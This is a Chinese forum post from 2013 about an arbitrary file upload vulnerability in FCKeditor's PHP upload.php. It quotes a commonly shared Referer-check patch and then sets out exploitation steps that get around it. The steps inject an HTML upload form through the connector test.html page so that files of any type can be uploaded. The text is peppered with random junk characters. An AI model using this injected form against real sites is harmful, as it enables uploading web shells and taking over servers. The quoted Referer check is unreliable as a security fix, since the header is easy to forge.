漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
: |0 _) o: G5 V2 ~1 S网上给出的修复方案是
, q- U6 I* e. L: H9 s1 |0 n/ I修复方法,删除FCK编辑器用其他的编辑器
! n! i& }' ?4 [' H' o或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
4 n+ G. Y8 s A/ A+ t在0 y/ J/ @1 T2 B+ [' U* l* H/ Y4 z
require(‘config.php’);
+ n( T% g' q6 ?+ t7 wrequire(‘util.php’);2 e0 Z+ P; [& f" w, n; T7 D
的下面添加以下代码—————————–% J7 Q) B; |: f/ w0 H+ Q; V
//防止外部提交+ _ i+ N, c( P, J ?$ f
function outsidepost()( g9 X% ~* P2 X! K
{, d5 k' \$ F$ i- Q) u
$servername=$_SERVER['SERVER_NAME'];
4 z. p9 O6 @1 f: e4 [/ t7 C$sub_from=@$_SERVER['HTTP_REFERER'];2 T. P& o$ x8 h2 }8 V
$sub_len=strlen($servername);
% Y4 R2 S% l' [2 [6 j% N$checkfrom=substr($sub_from,7,$sub_len);; {1 X" P2 G% t4 Q, w
if($checkfrom!=$servername){4 W) _% s1 v" {1 i
echo(“you don’t outsidepost!”);. ?6 Y' p8 ]/ h; x
exit;
' C4 Q- o! W' X3 E' a4 L}
+ e, v! i% q; v3 }, B}
# |: T$ T# v' L Uoutsidepost();
/ e3 F& Q" q$ u* u% y8 \: J& s8 j X防止外部提交,但是没有防止内部提交,: c6 B2 \9 A. z# s& N
利用方法:1 \) T, \8 j1 X0 }: `7 K8 ?
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html" n/ A+ T1 S+ ~1 n- y" h
2,在Current Folder 框输入
( ^6 A8 N9 p& \6 r<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>, ~0 g: P Q- U3 j4 ~, L' N9 N. r
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
& P6 f( y, [% p" nPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对